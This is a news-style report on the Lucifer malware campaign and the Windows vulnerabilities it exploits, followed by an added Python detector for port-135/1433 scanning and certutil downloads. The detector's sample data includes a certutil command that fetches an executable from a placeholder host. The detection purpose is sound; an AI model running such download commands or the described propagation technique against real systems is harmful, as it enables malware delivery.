Hackers are targeting unpatched critical Windows vulnerabilities with a new malware strain called "Lucifer" that is capable of both DDoS attacks and cryptojacking. According to Health IT Security's latest report, the new malware campaign was identified by Palo Alto Networks' Unit 42 research team.
The report stated that the new malware focuses on a long list of unpatched high- and critical-severity Windows vulnerabilities, using them for both cryptojacking and distributed denial-of-service (DDoS) attacks.
According to Health IT Security's previous report, the self-propagating malware could prove problematic, since Windows environments are already burdened with a host of patching issues. On May 29, the researchers discovered a new variant of hybrid cryptojacking malware exploiting a vulnerability in Laravel Framework 5.7.x.
According to the researchers' analysis of the variant, the new malware is also equipped with a series of exploits aimed at vulnerable Windows hosts. The first campaign ended on June 10, and the following day the hackers resumed it by spreading an upgraded version of the malware.
Besides dropping XMRig for cryptojacking, the researchers explained, Lucifer also uses its command-and-control (C2) operation to self-propagate by exploiting a host of vulnerabilities.
Unpatched Windows vulnerabilities targeted by new malware
According to Health IT Security, the Lucifer hackers employ credential brute-forcing, and they run the DoublePulsar backdoor and the EternalBlue and EternalRomance exploits against vulnerable targets for intranet infections. The global WannaCry cyberattack of 2017 used the EternalBlue exploit, and 40% of healthcare providers faced a WannaCry attack during the first half of 2019.
The exhaustive list of flaws leveraged by the Lucifer hackers includes CVE-2017-0144 and CVE-2017-0145 in the SMBv1 server of some Microsoft Windows platforms, the Apache Struts flaw CVE-2017-9791, and CVE-2017-8464, which affects some Windows Server versions.
The targeted vulnerabilities all carry high or critical ratings because they are trivial to exploit and inflict tremendous impact on the victim. To reach targets both externally and internally, the malware scans for open TCP ports 135 (RPC) and 1433 (MSSQL).
If the port is open, the malware brute-forces the login using an embedded password list and the default username "administrator"; after successful authentication, it copies the malware binary to the remote host and runs it.
"Once exploited, the attacker can execute arbitrary commands on the vulnerable device," said the security researchers. "In this case, the targets are Windows hosts on both the internet and intranet, given that the attacker is leveraging the certutil utility in the payload for malware propagation."
As an anti-sandbox measure, the upgraded version of Lucifer checks the computer name and username of the infected host.
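As an added defender-side example that is not part of the original report or of Unit 42's analysis, the following Python flags two of the behaviours described above over constructed telemetry: one source reaching many hosts on TCP 135/1433 within a short window, and certutil launched as a downloader. The record field names, the sample records, the placeholder URL and the `-urlcache` download form are assumptions of this example, not details given by the article.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (not real logs). Field names are this
# example's own assumption, not a format given in the article.
CONNECTIONS = [
    {"ts": 10, "src": "10.0.0.9", "dst": "10.0.0.21", "dport": 1433},
    {"ts": 11, "src": "10.0.0.9", "dst": "10.0.0.22", "dport": 1433},
    {"ts": 12, "src": "10.0.0.9", "dst": "10.0.0.23", "dport": 135},
    {"ts": 13, "src": "10.0.0.9", "dst": "10.0.0.24", "dport": 135},
    {"ts": 900, "src": "10.0.0.9", "dst": "10.0.0.25", "dport": 1433},  # too late
    {"ts": 14, "src": "10.0.0.7", "dst": "10.0.0.21", "dport": 1433},   # app server
]
PROCESSES = [
    {"host": "ws2", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://placeholder.invalid/a.exe a.exe"},
    {"host": "ws3", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -verify server.cer"},  # benign use
]

LUCIFER_PORTS = {135, 1433}  # RPC and MSSQL, the ports the article says are scanned


def scanning_sources(conns, min_targets=3, window=60):
    """Return {src: targets} for sources that reached at least min_targets
    distinct hosts on 135/1433 within any `window`-second span (scan-like)."""
    by_src = defaultdict(list)
    for c in conns:
        if c["dport"] in LUCIFER_PORTS:
            by_src[c["src"]].append((c["ts"], c["dst"]))
    hits = {}
    for src, recs in by_src.items():
        recs.sort()
        lo = 0
        for hi in range(len(recs)):
            while recs[hi][0] - recs[lo][0] > window:  # slide the window start
                lo += 1
            targets = {dst for _, dst in recs[lo:hi + 1]}
            if len(targets) >= min_targets:
                hits[src] = max(hits.get(src, 0), len(targets))
    return hits


# Assumption: certutil used as a downloader (-urlcache plus a URL); the article names certutil but not its switches.
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b.*\bhttps?://", re.I)


def certutil_downloads(procs):
    """Return hosts where certutil.exe was launched with a download-style command line."""
    return [p["host"] for p in procs
            if p["image"].lower().endswith("certutil.exe")
            and CERTUTIL_DOWNLOAD.search(p["cmdline"])]
```

Both rules are intentionally coarse: tune `min_targets` and `window` to the environment, and expect legitimate administration tooling to need an allow-list.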